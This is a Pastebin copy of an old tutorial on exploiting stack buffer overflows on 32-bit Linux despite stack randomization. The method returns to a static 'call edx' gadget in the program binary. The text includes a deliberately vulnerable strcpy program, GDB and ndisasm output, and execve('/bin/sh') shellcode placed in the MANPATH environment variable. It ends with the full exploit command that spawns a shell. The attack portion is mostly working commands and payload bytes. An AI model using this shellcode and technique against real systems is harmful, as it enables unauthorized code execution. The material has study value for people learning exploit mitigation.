Advertisement
opexxx

VAstacksmash.txt

Apr 15th, 2014
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.28 KB | None | 0 0
  1. Linux Virtual Addresses Exploitation
  2. ====================================
  3. Linux kernel recently incorporated a protection which randomizes the stack making exploitation of
  4. stack based overflows more difficult. I present here an attack which works on exploiting static
  5. addresses in Linux. You should be familiar with standard stack smashing before attempting this
  6. paper.
  7.  
  8. Virtual Addresses
  9. =================
  10. Lets take a look at two instances of the same program which is a simple loop() to check maps.
  11.  
  12. prdelka@gentoo ~ $ cat /proc/5415/maps
  13. 08048000-08049000 r-xp 00000000 03:01 493449 /home/prdelka/env
  14. 08049000-0804a000 rw-p 00000000 03:01 493449 /home/prdelka/env
  15. b7e02000-b7f0b000 r-xp 00000000 03:01 229995 /lib/libc-2.3.5.so
  16. b7f0b000-b7f0c000 ---p 00109000 03:01 229995 /lib/libc-2.3.5.so
  17. b7f0c000-b7f0d000 r--p 00109000 03:01 229995 /lib/libc-2.3.5.so
  18. b7f0d000-b7f10000 rw-p 0010a000 03:01 229995 /lib/libc-2.3.5.so
  19. b7f10000-b7f13000 rw-p b7f10000 00:00 0
  20. b7f1f000-b7f34000 r-xp 00000000 03:01 230174 /lib/ld-2.3.5.so
  21. b7f34000-b7f35000 r--p 00014000 03:01 230174 /lib/ld-2.3.5.so
  22. b7f35000-b7f36000 rw-p 00015000 03:01 230174 /lib/ld-2.3.5.so
  23. bfd1f000-bfd34000 rw-p bfd1f000 00:00 0 [stack]
  24. ffffe000-fffff000 ---p 00000000 00:00 0 [vdso]
  25.  
  26. prdelka@gentoo ~ $ cat /proc/5426/maps
  27. 08048000-08049000 r-xp 00000000 03:01 493449 /home/prdelka/env
  28. 08049000-0804a000 rw-p 00000000 03:01 493449 /home/prdelka/env
  29. b7df6000-b7eff000 r-xp 00000000 03:01 229995 /lib/libc-2.3.5.so
  30. b7eff000-b7f00000 ---p 00109000 03:01 229995 /lib/libc-2.3.5.so
  31. b7f00000-b7f01000 r--p 00109000 03:01 229995 /lib/libc-2.3.5.so
  32. b7f01000-b7f04000 rw-p 0010a000 03:01 229995 /lib/libc-2.3.5.so
  33. b7f04000-b7f07000 rw-p b7f04000 00:00 0
  34. b7f13000-b7f28000 r-xp 00000000 03:01 230174 /lib/ld-2.3.5.so
  35. b7f28000-b7f29000 r--p 00014000 03:01 230174 /lib/ld-2.3.5.so
  36. b7f29000-b7f2a000 rw-p 00015000 03:01 230174 /lib/ld-2.3.5.so
  37. bfc0e000-bfc28000 rw-p bfc0e000 00:00 0 [stack]
  38. ffffe000-fffff000 ---p 00000000 00:00 0 [vdso]
  39.  
  40. We can see the stack is randomized along with the libaries making ret-into-libc
  41. difficult. However we are left with one constant between the two programs.
  42.  
  43. 08048000-08049000 r-xp 00000000 03:01 493449 /home/prdelka/env
  44. 08049000-0804a000 rw-p 00000000 03:01 493449 /home/prdelka/env
  45.  
  46. So we must find our return address here. Let us take a look now at a vulnerable program.
  47.  
  48. prdelka@gentoo ~ $ cat bug.c
  49. #include <stdio.h>
  50.  
  51. int main(int argc,char* argv[]){
  52. char buffer[100];
  53. strcpy(buffer,argv[1]);
  54. return 1;
  55. }
  56.  
  57. We will now overflow the stack and look at the registers. using ./bug `perl -e 'print "A"x5000'`
  58. and GDB.
  59.  
  60. Program received signal SIGSEGV, Segmentation fault.
  61. Error while running hook_stop:
  62. Invalid type combination in ordering comparison.
  63. 0x41414141 in ?? ()
  64. gdb> i r
  65. eax 0x1 0x1
  66. ecx 0xffffe21d 0xffffe21d
  67. edx 0xbfa0b71b 0xbfa0b71b
  68. ebx 0xb7ee6ff4 0xb7ee6ff4
  69. esp 0xbfa08630 0xbfa08630
  70. ebp 0x41414141 0x41414141
  71. esi 0xb7f0dc80 0xb7f0dc80
  72. edi 0xbfa08674 0xbfa08674
  73. eip 0x41414141 0x41414141
  74. eflags 0x10246 0x10246
  75. cs 0x73 0x73
  76. ss 0x7b 0x7b
  77. ds 0x7b 0x7b
  78. es 0x7b 0x7b
  79. fs 0x0 0x0
  80. gs 0x0 0x0
  81.  
  82. If we examine more closely we can find the randomized address of the environment pointer in EDX which
  83. is always pointing to our environment variables in example vulnerability, this is often the case in
  84. regular command line arguement overflows.
  85.  
  86. gdb> x/s $edx
  87. 0xbfa0b71b: "MANPATH=",
  88.  
  89. To exploit the program, we must find a way to "call $edx", "jmp $edx" or "push $edx, retn". We can find
  90. a usable return address in our static area of memory from the ELF binary, we use ndisasm and grep.
  91.  
  92. prdelka@gentoo ~ $ ./ndisasm bug | grep "call dx"
  93. 00000338 FFD2 call dx
  94. 000016F3 FFD2 call dx
  95.  
  96. so we know the base address of the ELF binary is 08048000, if we add the offset 0x338 we have a return
  97. address of 0x8048338! If we examine this return address in GDB we see the following.
  98.  
  99. 0x8048338 <__do_global_dtors_aux+40>: call *%edx
  100.  
  101. Exploitation
  102. ============
  103. To exploit the bug we will place our payload in the first environment variable, to find this we run the
  104. 'env' command.
  105.  
  106. prdelka@gentoo ~ $ env
  107. MANPATH=/usr/local/share/man:/usr/share/man:/usr/share/binutils-data/i686-pc-linux-gnu/2.15.92.0.2
  108. /man:/usr/share/gcc-data/i686-pc-linux-gnu/3.3.6/man:/usr/qt/3/doc/man
  109.  
  110. We will now put our shellcode in this environment variable.
  111.  
  112. prdelka@gentoo ~ $ export MANPATH=`perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68";print "//sh";print "\x68";print "/bin";print "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";'`
  113.  
  114. We can now exploit our application with our return address we found previously.
  115.  
  116. prdelka@gentoo ~ $ uname -a
  117. Linux gentoo 2.6.12-gentoo-r10 #2 Tue Sep 13 00:33:15 IDT 2005 i686 Mobile Intel(R) Celeron(R) CPU 1.70GHz GenuineIntel GNU/Linux
  118. prdelka@gentoo ~ $ ./bug `perl -e 'print "\x90"x124;print "\x38\x83\x04\x08";'`
  119. sh-3.00$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement